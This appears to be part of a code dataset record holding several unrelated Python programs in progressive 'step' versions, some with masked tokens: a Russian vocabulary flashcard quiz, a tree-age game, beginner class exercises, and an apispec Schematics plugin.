deck.flashcards.append(fc)\n return deck\n\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or\n first_letter == -1]\n return flashcards[start_index:number_of_cards + start_index]\n\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n play_cards(mode, deck, flashcards)\n\n\ndef play_cards(mode, deck, cards):\n source = deck.front if mode % 2 == 0 else deck.back\n target = deck.back if mode % 2 == 0 else deck.front\n if mode >= 2:\n 
random.shuffle(cards)\n num_cards = len(cards)\n start_time = time.time()\n for i, fc in enumerate(cards):\n source_word = fc.front if mode % 2 == 0 else fc.back\n target_word = fc.back if mode % 2 == 0 else fc.front\n quiz(fc, source, source_word, target, target_word, i, num_cards)\n print('All Done!')\n correct = sum(fc.correct == True for fc in cards)\n incorrect = len(cards) - correct\n print('Correct: {}'.format(correct))\n print('Incorrect: {}'.format(incorrect))\n if incorrect:\n incorrect_cards = [fc for fc in cards if not fc.correct]\n print('\\n'.join([fc.show_card() for fc in incorrect_cards]))\n again = input('review incorrect words (y/n): ')\n if again == 'y' or again == '1' or again == 'да':\n play_cards(mode, deck, incorrect_cards)\n else:\n finish_time = time.time()\n time_diff = time.gmtime(finish_time - start_time)\n avg_time = time.gmtime((finish_time - start_time) / num_cards)\n print('Total Time: {}'.format(time.strftime('%H:%M:%S', time_diff)))\n print('Time per card: {}'.format(time.strftime('%H:%M:%S', avg_time)))\n\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i,\n number_of_cards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n print('{} word: {}'.format(source_language, source_word))\n answer = input('Enter {} translation: '.format(target_language))\n if is_correct(answer, target_word):\n fc.correct = True\n print('Correct!')\n else:\n print('Incorrect! 
Correct answer was: {}'.format(target_word))\n n = input('Enter {} translation for {}: '.format(target_language,\n source_word))\n\n\ndef is_correct(answer, target):\n return format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n word = word.strip().lower()\n word = word.split('(')\n word[0] = word[0].split(', ')\n word[0].sort()\n word[0] = ', '.join(word[0])\n word = '('.join(word)\n return word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n for i, card in enumerate(flashcards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n input('{}\\nPractice: '.format(card.show_card()))\n input('{}\\nPractice: '.format(card.show_front()))\n input('{}\\nPractice: '.format(card.show_back()))\n print('Done! Review learned words:')\n for card in flashcards:\n print('{}'.format(card.show_card()))\n\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n num_cols = 9\n deck = create_deck(filename, num_cols)\n print('Welcome to The Flashcard Learner!')\n print(\"Okay! Let's play!\")\n if mode == 4:\n learn_words(deck, first_letter, start_index, number_of_cards)\n else:\n play_game(deck, mode, first_letter, start_index, number_of_cards)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Learn flashcards')\n parser.add_argument('filename', help='name of .xlsx file with vocab',\n default='RussianVocab.xlsx')\n parser.add_argument('category', type=int, help=\n 'e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)')\n parser.add_argument('start', type=int, help=\n 'start index (lists are 0-indexed)')\n parser.add_argument('num', type=int, help=\n \"number of cards you'd like to see\")\n parser.add_argument('mode', type=int)\n args = parser.parse_args()\n main(args.filename, args.category, args.start, args.num, args.mode)\n",
"step-5": "import argparse\nimport pandas as pd\nimport random\nimport time\n\nclass Deck:\n\tdef __init__(self, num_cols, front, back):\n\t\tself.flashcards = []\n\t\tself.num_cols = num_cols\n\t\tself.front = front\n\t\tself.back = back\n\nclass Flashcard:\n\tdef __init__(self, deck, front, back, column, row):\n\t\tself.deck = deck\n\t\tself.front = front\n\t\tself.back = back\n\t\tself.column = column\n\t\tself.row = row\n\t\tself.correct = False\n\n\tdef show_front(self):\n\t\tr = \"{}: {}\".format(self.deck.front, self.front)\n\t\treturn r\n\n\tdef show_back(self):\n\t\treturn \"{}: {}\".format(self.deck.back, self.back)\n\n\tdef show_card(self):\n\t\treturn \"{}: {}, {}: {}\".format(self.deck.front, self.front, self.deck.back, self.back)\n\n\tdef show_reverse(self):\n\t\treturn \"{}: {}, {}: {}\".format(self.deck.back, self.back, self.deck.front, self.front)\n\n\ndef create_deck(filename, num_cols):\n\tdf = pd.read_excel(filename)\n\tfront = df.columns.values[0]\n\tback = df.columns.values[1]\n\n\tdeck = Deck(num_cols, front, back)\n\tfor i in range(num_cols):\n\t\tfront_column = \"{}.{}\".format(front, i) if i else front\n\t\tback_column = \"{}.{}\".format(back, i) if i else back\n\t\tfor row in range(df[front_column].size):\n\t\t\tf = df[front_column][row]\n\t\t\tb = df[back_column][row]\n\t\t\tif not (pd.isnull(f) or pd.isnull(b)):\t\n\t\t\t\tfc = Flashcard(deck, f.strip(), b.strip(), i, row)\n\t\t\t\tdeck.flashcards.append(fc)\n\t\n\treturn deck\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n\tflashcards = [fc for fc in deck.flashcards if fc.column == first_letter or first_letter == -1]\n\treturn flashcards[start_index:number_of_cards+start_index]\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n\tflashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)\n\tplay_cards(mode, deck, flashcards)\n\ndef play_cards(mode, deck, cards):\n\tsource = deck.front if mode%2 == 0 else 
deck.back\n\ttarget = deck.back if mode%2 == 0 else deck.front\n\n\tif mode >= 2:\n\t\trandom.shuffle(cards)\n\n\tnum_cards = len(cards)\n\tstart_time = time.time()\n\n\tfor i, fc in enumerate(cards):\n\t\tsource_word = fc.front if mode%2==0 else fc.back\n\t\ttarget_word = fc.back if mode%2==0 else fc.front\n\n\t\tquiz(fc, source, source_word, target, target_word, i, num_cards)\n\n\tprint(\"All Done!\")\n\tcorrect = sum(fc.correct == True for fc in cards)\n\tincorrect = len(cards) - correct\n\tprint(\"Correct: {}\".format(correct))\n\tprint(\"Incorrect: {}\".format(incorrect))\n\n\tif (incorrect):\n\t\tincorrect_cards = [fc for fc in cards if not fc.correct]\n\t\tprint(\"\\n\".join([fc.show_card() for fc in incorrect_cards]))\n\t\tagain = input(\"review incorrect words (y/n): \")\n\t\tif again == 'y' or again == '1' or again == 'да':\n\t\t\tplay_cards(mode, deck, incorrect_cards)\n\telse:\n\t\tfinish_time = time.time()\n\t\ttime_diff = time.gmtime(finish_time - start_time)\n\t\tavg_time = time.gmtime((finish_time - start_time) / num_cards)\n\t\tprint(\"Total Time: {}\".format(time.strftime(\"%H:%M:%S\", time_diff)))\n\t\tprint(\"Time per card: {}\".format(time.strftime(\"%H:%M:%S\", avg_time)))\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i, number_of_cards):\n\t\tprint(\"Card {}/{}\".format(i+1, number_of_cards))\n\t\tprint(\"{} word: {}\".format(source_language, source_word))\n\t\tanswer = input(\"Enter {} translation: \".format(target_language))\n\t\t\n\t\tif is_correct(answer, target_word):\n\t\t\tfc.correct = True\n\t\t\tprint(\"Correct!\")\n\t\t\n\t\telse:\n\t\t\tprint(\"Incorrect! 
Correct answer was: {}\".format(target_word))\n\t\t\tn = input(\"Enter {} translation for {}: \".format(target_language, source_word))\n\n\ndef is_correct(answer, target):\n\treturn format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n\t# strip whitespace and lowercase\n\tword = word.strip().lower()\n\n\t# pop off the declensions from the end\n\tword = word.split('(')\n\n\t# sort the list of meanings\n\tword[0] = word[0].split(', ')\n\tword[0].sort()\n\n\t# join the first part back together:\n\tword[0] = ', '.join(word[0])\n\n\t# now add the declensions back on\n\tword = '('.join(word)\n\t\n\treturn word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n\tflashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)\n\tfor i, card in enumerate(flashcards):\n\t\tprint(\"Card {}/{}\".format(i+1, number_of_cards))\n\t\tinput(\"{}\\nPractice: \".format(card.show_card()))\n\t\tinput(\"{}\\nPractice: \".format(card.show_front()))\n\t\tinput(\"{}\\nPractice: \".format(card.show_back()))\n\t\n\tprint(\"Done! Review learned words:\")\n\tfor card in flashcards:\n\t\tprint(\"{}\".format(card.show_card()))\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n\tnum_cols = 9\n\tdeck = create_deck(filename, num_cols)\n\tprint(\"Welcome to The Flashcard Learner!\")\n\t# print(\"Available Modes:\")\n\t# print(\"0: Quiz - Given a word in {}, provide {} translation\".format(deck.front.lower(), deck.back.lower()))\n\t# print(\"1: Quiz - Given a word in {}, provide {} translation\".format(deck.back.lower(), deck.front.lower()))\n\t# print(\"2: Mode 0 with cards given in random order\")\n\t# print(\"3: Mode 1 with cards given in random order\")\n\t# print(\"4: Learning - Shown {} and {} side by side, practice typing both\".format(deck.front.lower(), deck.back.lower()))\n\t# mode = int(input(\"Enter mode: \"))\n\t\n\tprint(\"Okay! 
Let's play!\")\n\tif mode == 4:\n\t\tlearn_words(deck, first_letter, start_index, number_of_cards)\n\telse:\n\t\tplay_game(deck, mode, first_letter, start_index, number_of_cards)\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"Learn flashcards\")\n\tparser.add_argument(\"filename\", help=\"name of .xlsx file with vocab\", default=\"RussianVocab.xlsx\")\n\tparser.add_argument(\"category\", type=int, help=\"e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)\")\n\tparser.add_argument(\"start\", type=int, help=\"start index (lists are 0-indexed)\")\n\tparser.add_argument(\"num\", type=int, help=\"number of cards you'd like to see\")\n\tparser.add_argument(\"mode\", type=int)\n\targs = parser.parse_args()\n\tmain(args.filename, args.category, args.start, args.num, args.mode)\n\n",
"step-ids": [
8,
17,
18,
19,
20
]
}
|
[
8,
17,
18,
19,
20
] |
import random
tree_age = 1  # current age of the tree, incremented once per round
state = "alive"  # "alive" or "dead"
value = 1  # main-loop flag: 1 = keep playing, 2 = quit
age_display = "Your tree have an age of: {}".format(tree_age)
state_display = "Your tree is {}.".format(state)
def tree_state(x):
    """Return "alive" or "dead" for a tree of age *x*.

    Ages up to 19 always survive; 50 and above always die.  In between,
    a roll in [x, 50] is taken and only a roll of exactly 50 kills the
    tree, so the death chance grows as the tree ages.

    Fix: the original read the global ``tree_age`` inside the random
    branch instead of the parameter ``x`` (identical at the existing
    call site, but wrong for any other caller).
    """
    if x <= 19:
        return "alive"
    if x <= 49:
        # randrange(x, 51) yields x..50 inclusive; only 50 is fatal.
        return "dead" if random.randrange(x, 51, 1) == 50 else "alive"
    return "dead"
# Main game loop.  BUG FIX: the original called tree_state(tree_age) and
# discarded the return value (the author's own comment flagged this), so
# the global `state` never changed and the tree could never die; the
# state display was also never refreshed.  Capture the result instead.
print("Welcome to your tree garden!")

while value == 1 :
    print(age_display)
    print(state_display)
    print("Please press 1 to increase is age or 2 to quit.")
    action = input("Select 1/2 ")

    if action == "2" :
        value = 2

    elif action == "1" :
        tree_age += 1
        state = tree_state(tree_age)  # capture the new state
        print(state)
        if state == "dead":
            print("Sorry your tree is dead.")
            quit()
        else:
            age_display = "Your tree have an age of: {}".format(tree_age)
            state_display = "Your tree is {}.".format(state)  # keep display in sync

    else:
        print("Invalid input, please enter the right input.")

if value == 2:
    print("Thanks")
|
normal
|
{
"blob_id": "763f552329a0d38900e08081a1017b33cd882868",
"index": 9391,
"step-1": "<mask token>\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\nprint('Welcome to your tree garden!')\nwhile value == 1:\n print(age_display)\n print(state_display)\n print('Please press 1 to increase is age or 2 to quit.')\n action = input('Select 1/2 ')\n if action == '2':\n value = 2\n elif action == '1':\n tree_age += 1\n tree_state(tree_age)\n print(state)\n if state == 'dead':\n print('Sorry your tree is dead.')\n quit()\n else:\n age_display = 'Your tree have an age of: {}'.format(tree_age)\n else:\n print('Invalid input, please enter the right input.')\nif value == 2:\n print('Thanks')\n",
"step-3": "<mask token>\ntree_age = 1\nstate = 'alive'\nvalue = 1\nage_display = 'Your tree have an age of: {}'.format(tree_age)\nstate_display = 'Your tree is {}.'.format(state)\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\nprint('Welcome to your tree garden!')\nwhile value == 1:\n print(age_display)\n print(state_display)\n print('Please press 1 to increase is age or 2 to quit.')\n action = input('Select 1/2 ')\n if action == '2':\n value = 2\n elif action == '1':\n tree_age += 1\n tree_state(tree_age)\n print(state)\n if state == 'dead':\n print('Sorry your tree is dead.')\n quit()\n else:\n age_display = 'Your tree have an age of: {}'.format(tree_age)\n else:\n print('Invalid input, please enter the right input.')\nif value == 2:\n print('Thanks')\n",
"step-4": "import random\ntree_age = 1\nstate = 'alive'\nvalue = 1\nage_display = 'Your tree have an age of: {}'.format(tree_age)\nstate_display = 'Your tree is {}.'.format(state)\n\n\ndef tree_state(x):\n if x <= 19:\n state = 'alive'\n return state\n elif x <= 49:\n rand = random.randrange(tree_age, 51, 1)\n if rand == 50:\n state = 'dead'\n else:\n state = 'alive'\n return state\n else:\n state = 'dead'\n return state\n\n\nprint('Welcome to your tree garden!')\nwhile value == 1:\n print(age_display)\n print(state_display)\n print('Please press 1 to increase is age or 2 to quit.')\n action = input('Select 1/2 ')\n if action == '2':\n value = 2\n elif action == '1':\n tree_age += 1\n tree_state(tree_age)\n print(state)\n if state == 'dead':\n print('Sorry your tree is dead.')\n quit()\n else:\n age_display = 'Your tree have an age of: {}'.format(tree_age)\n else:\n print('Invalid input, please enter the right input.')\nif value == 2:\n print('Thanks')\n",
"step-5": "import random\r\n\r\ntree_age = 1\r\n\r\nstate = \"alive\"\r\n\r\nvalue = 1\r\n\r\nage_display = \"Your tree have an age of: {}\".format(tree_age)\r\nstate_display = \"Your tree is {}.\".format(state)\r\n\r\ndef tree_state(x):\r\n if x <= 19:\r\n state = \"alive\"\r\n return state\r\n elif x <= 49:\r\n rand = random.randrange(tree_age, 51, 1)\r\n if rand == 50:\r\n state = \"dead\"\r\n else:\r\n state = \"alive\"\r\n return state\r\n else:\r\n state = \"dead\"\r\n return state\r\n \r\nprint(\"Welcome to your tree garden!\")\r\n\r\nwhile value == 1 :\r\n \r\n print(age_display)\r\n print(state_display)\r\n print(\"Please press 1 to increase is age or 2 to quit.\")\r\n action = input(\"Select 1/2 \")\r\n\r\n if action == \"2\" :\r\n value = 2\r\n\r\n elif action == \"1\" :\r\n tree_age += 1\r\n #la fonction tree_state ne se lance pas je crois\r\n tree_state(tree_age)\r\n print(state)\r\n if state == \"dead\":\r\n print(\"Sorry your tree is dead.\")\r\n quit()\r\n else:\r\n age_display = \"Your tree have an age of: {}\".format(tree_age)\r\n\r\n else:\r\n print(\"Invalid input, please enter the right input.\")\r\n\r\nif value == 2:\r\n print(\"Thanks\")\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Getting familiar with OOP and using Functions and Classes :)
class Dog():
    """A dog identified by a breed and a name that can bark a number."""

    # Class-level attribute shared by every Dog instance.
    species = 'mammal'

    def __init__(self, breed, name):
        # Store the per-instance attributes.
        self.breed, self.name = breed, name

    def bark(self, number):
        # Announce the dog's name along with the caller-supplied number.
        print(f'Woof! My name is {self.name} and the number is {number}')
# Exercise the Dog class: build an instance and inspect its attributes.
my_dog = Dog('Corgi','RTZY')
print(type(my_dog))  # shows the instance's class
print(my_dog.breed)
print(my_dog.name)
my_dog.bark(10)  # bark() prints its message and returns None
class Circle():
    """A circle whose area is computed once, at construction time."""

    # Shared approximation of pi (kept at 3.14 to preserve existing results).
    pi = 3.14

    def __init__(self, radius=1):
        self.radius = radius
        # NOTE(review): area is frozen here; it will not track later
        # changes to self.radius.
        self.area = Circle.pi * (radius * radius)

    def get_circumference(self):
        """Return the circumference, 2 * pi * radius."""
        pi_times_radius = self.radius * Circle.pi
        return pi_times_radius * 2
# Exercise the Circle class with a radius of 30.
my_circle = Circle(30)
print(my_circle.area)  # area computed in __init__
test = my_circle.get_circumference()
print(test)
class Animal():
    """Base class that announces its creation and simple actions."""

    def __init__(self):
        # Side effect only: report that an animal came into existence.
        print('Animal Created')

    def who_am_i(self):
        print('I am an animal')

    def eat(self):
        print('I am eating')
# Print an extra blank line to visually separate the demos' output.
print('\n')
class Dog(Animal):
    """Animal subclass demonstrating inheritance; adds a bark() action."""

    def __init__(self):
        # Run the base-class initializer first (it prints 'Animal Created'),
        # then announce the Dog itself.
        super().__init__()
        print('Dog Created')

    def bark(self):
        print('Woof! Woof!')
# Instantiating Dog prints from both __init__ methods (base then subclass).
mydog = Dog()
print(mydog.bark())  # bark() prints and returns None, so this also prints None
|
normal
|
{
"blob_id": "c8137aacfb0f35c9630515442d5bdda870e9908a",
"index": 4827,
"step-1": "<mask token>\n\n\nclass Circle:\n <mask token>\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\n<mask token>\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Circle:\n pi = 3.14\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\n<mask token>\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\n",
"step-3": "class Dog:\n <mask token>\n\n def __init__(self, breed, name):\n self.breed = breed\n self.name = name\n <mask token>\n\n\n<mask token>\n\n\nclass Circle:\n pi = 3.14\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\n<mask token>\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\n",
"step-4": "class Dog:\n species = 'mammal'\n\n def __init__(self, breed, name):\n self.breed = breed\n self.name = name\n\n def bark(self, number):\n print(f'Woof! My name is {self.name} and the number is {number}')\n\n\n<mask token>\nprint(type(my_dog))\nprint(my_dog.breed)\nprint(my_dog.name)\nmy_dog.bark(10)\n\n\nclass Circle:\n pi = 3.14\n\n def __init__(self, radius=1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n\n def get_circumference(self):\n return self.radius * Circle.pi * 2\n\n\n<mask token>\nprint(my_circle.area)\n<mask token>\nprint(test)\n\n\nclass Animal:\n\n def __init__(self):\n print('Animal Created')\n\n def who_am_i(self):\n print('I am an animal')\n\n def eat(self):\n print('I am eating')\n\n\nprint('\\n')\n\n\nclass Dog(Animal):\n\n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n\n def bark(self):\n print('Woof! Woof!')\n\n\n<mask token>\nprint(mydog.bark())\n",
"step-5": "# Getting familiar with OOP and using Functions and Classes :)\nclass Dog():\n \n species = 'mammal'\n\n def __init__(self,breed,name):\n\n self.breed = breed\n self.name = name\n \n def bark(self,number):\n print(f'Woof! My name is {self.name} and the number is {number}')\n\nmy_dog = Dog('Corgi','RTZY')\nprint(type(my_dog))\nprint(my_dog.breed)\nprint(my_dog.name)\nmy_dog.bark(10)\n\nclass Circle():\n \n pi = 3.14\n\n def __init__(self,radius = 1):\n self.radius = radius\n self.area = radius * radius * Circle.pi\n \n def get_circumference(self):\n return (self.radius * Circle.pi) * 2\n\nmy_circle = Circle(30)\nprint(my_circle.area)\ntest = my_circle.get_circumference()\nprint(test)\n\nclass Animal():\n\n def __init__(self):\n print('Animal Created')\n \n def who_am_i(self):\n print('I am an animal')\n \n def eat(self):\n print('I am eating')\n\nprint('\\n')\nclass Dog(Animal):\n \n def __init__(self):\n Animal.__init__(self)\n print('Dog Created')\n def bark(self):\n print('Woof! Woof!')\n\nmydog = Dog()\nprint(mydog.bark())",
"step-ids": [
10,
11,
13,
16,
18
]
}
|
[
10,
11,
13,
16,
18
] |
# -*- coding: utf-8 -*-
"""
openapi.schematics
~~~~~~~~~~~~~~~~~~
Schematics plugin for apispec based on ext.MarshmallowPlugin
"""
import warnings
from apispec import BasePlugin
from .common import resolve_schema_instance, make_schema_key
from .openapi import OpenAPIConverter
def resolver(schema):
    """Default schema-name resolver: strip a trailing "Schema" suffix.

    A class named exactly "Schema" keeps its full name, since stripping
    the suffix would leave an empty string.
    """
    full_name = schema.__name__
    suffix = "Schema"
    if not full_name.endswith(suffix):
        return full_name
    stripped = full_name[: -len(suffix)]
    return stripped or full_name
class SchematicsPlugin(BasePlugin):
    """APISpec plugin handling schematics models.

    :param callable schema_name_resolver: Callable to generate the schema definition name.
        Receives the `Schema` class and returns the name to be used in refs within
        the generated spec. When working with circular referencing this function
        must not return `None` for schemas in a circular reference chain.
        Example: ::
            def schema_name_resolver(schema):
                return schema.__name__
    """
    def __init__(self, schema_name_resolver=None):
        super().__init__()
        # Fall back to the module-level default resolver when none is supplied.
        self.schema_name_resolver = schema_name_resolver or resolver
        # These are populated by init_spec(); None until the plugin is bound.
        self.spec = None
        self.openapi_version = None
        self.openapi = None
    def init_spec(self, spec):
        """APISpec hook: bind this plugin to *spec* and build the converter
        used to turn schema instances into OpenAPI dicts.
        """
        super().init_spec(spec)
        self.spec = spec
        self.openapi_version = spec.openapi_version
        self.openapi = OpenAPIConverter(
            openapi_version=spec.openapi_version,
            schema_name_resolver=self.schema_name_resolver,
            spec=spec,
        )
    def resolve_parameters(self, parameters):
        """Resolve schema-bearing parameters into OpenAPI parameter dicts.

        A parameter whose "schema" value is a schema object (not a plain
        dict) and that declares an "in" location is expanded via
        ``schema2parameters`` into one or more native parameter dicts.
        Every other parameter is passed through with any nested schema
        resolved in place.
        """
        resolved = []
        for parameter in parameters:
            if isinstance(parameter, dict) and not isinstance(
                parameter.get("schema", {}), dict
            ):
                schema_instance = resolve_schema_instance(parameter["schema"])
                if "in" in parameter:
                    # The raw schema is replaced by the expanded parameter
                    # list, so drop it before expansion.
                    del parameter["schema"]
                    resolved += self.openapi.schema2parameters(
                        schema_instance, default_in=parameter.pop("in"), **parameter
                    )
                    continue
                # No "in" location: fall through and resolve the schema in
                # place instead of expanding, which would KeyError on
                # parameter.pop("in").
            self.resolve_schema(parameter)
            resolved.append(parameter)
        return resolved
    def resolve_schema_in_request_body(self, request_body):
        """Resolve the schema in a requestBody object - modifies the request
        body dict to convert a Schema object or class into a dict.
        """
        content = request_body["content"]
        for content_type in content:
            schema = content[content_type]["schema"]
            content[content_type]["schema"] = self.openapi.resolve_schema_dict(schema)
    def resolve_schema(self, data):
        """Resolve a schema in a parameter or response - modifies the
        corresponding dict to convert a Schema object or class into a dict.

        :param APISpec spec: `APISpec` containing refs.
        :param dict|str data: either a parameter or response dictionary that may
            contain a schema, or a reference provided as string
        """
        if not isinstance(data, dict):
            return
        # OAS 2 component or OAS 3 header
        if "schema" in data:
            data["schema"] = self.openapi.resolve_schema_dict(data["schema"])
        # OAS 3 component except header
        if self.openapi_version.major >= 3:
            if "content" in data:
                for content_type in data["content"]:
                    schema = data["content"][content_type]["schema"]
                    data["content"][content_type][
                        "schema"
                    ] = self.openapi.resolve_schema_dict(schema)
    def map_to_openapi_type(self, *args):
        """Decorator to set mapping for custom fields.

        ``*args`` can be:

        - a pair of the form ``(type, format)``
        - a core field type (in which case we reuse that type's mapping)

        Examples: ::

            @ma_plugin.map_to_openapi_type('string', 'uuid')
            class MyCustomField(Integer):
                # ...

            @ma_plugin.map_to_openapi_type(Integer)  # will map to ('integer', 'int32')
            class MyCustomFieldThatsKindaLikeAnInteger(Integer):
                # ...
        """
        return self.openapi.map_to_openapi_type(*args)
    def schema_helper(self, name, _, schema=None, **kwargs):
        """Definition helper that allows using a
        :class:`Schema <marshmallow.Schema>` to provide OpenAPI metadata.

        :param type|Schema schema: A Schema class or instance.
        """
        if schema is None:
            return None
        schema_instance = resolve_schema_instance(schema)
        schema_key = make_schema_key(schema_instance)
        self.warn_if_schema_already_in_spec(schema_key)
        # Remember the ref name so later resolutions emit a $ref instead of
        # inlining the schema again.
        self.openapi.refs[schema_key] = name
        json_schema = self.openapi.schema2jsonschema(schema_instance)
        return json_schema
    def parameter_helper(self, parameter, **kwargs):
        """Parameter component helper that allows using a
        :class:`Schema <marshmallow.Schema>` in parameter definition.

        :param dict parameter: parameter fields. May contain a Schema
            class or instance.
        """
        # In OpenAPIv3, this only works when using the complex form using "content"
        self.resolve_schema(parameter)
        return parameter
    def response_helper(self, response, **kwargs):
        """Response component helper that allows using a
        :class:`Schema <marshmallow.Schema>` in response definition.

        :param dict response: response fields. May contain a Schema
            class or instance.
        """
        self.resolve_schema(response)
        if "headers" in response:
            for header in response["headers"].values():
                self.resolve_schema(header)
        return response
    def operation_helper(self, operations, **kwargs):
        """Operation helper: resolve schemas inside the parameters, request
        bodies and responses of every operation in *operations*.
        """
        for operation in operations.values():
            if not isinstance(operation, dict):
                continue
            if "parameters" in operation:
                operation["parameters"] = self.resolve_parameters(
                    operation["parameters"]
                )
            if self.openapi_version.major >= 3:
                if "requestBody" in operation:
                    self.resolve_schema_in_request_body(operation["requestBody"])
            for response in operation.get("responses", {}).values():
                self.resolve_schema(response)
                if "headers" in response:
                    for header in response["headers"].values():
                        self.resolve_schema(header)
    def warn_if_schema_already_in_spec(self, schema_key):
        """Warn the user if the schema has already been added to the spec."""
        if schema_key in self.openapi.refs:
            warnings.warn(
                "{} has already been added to the spec. Adding it twice may "
                "cause references to not resolve properly.".format(schema_key[0]),
                UserWarning,
            )
|
normal
|
{
"blob_id": "1c5655563d05498f016fb2d41a07331b9e8de5e8",
"index": 2019,
"step-1": "<mask token>\n\n\nclass SchematicsPlugin(BasePlugin):\n <mask token>\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major 
>= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n <mask token>\n <mask token>\n <mask token>\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def 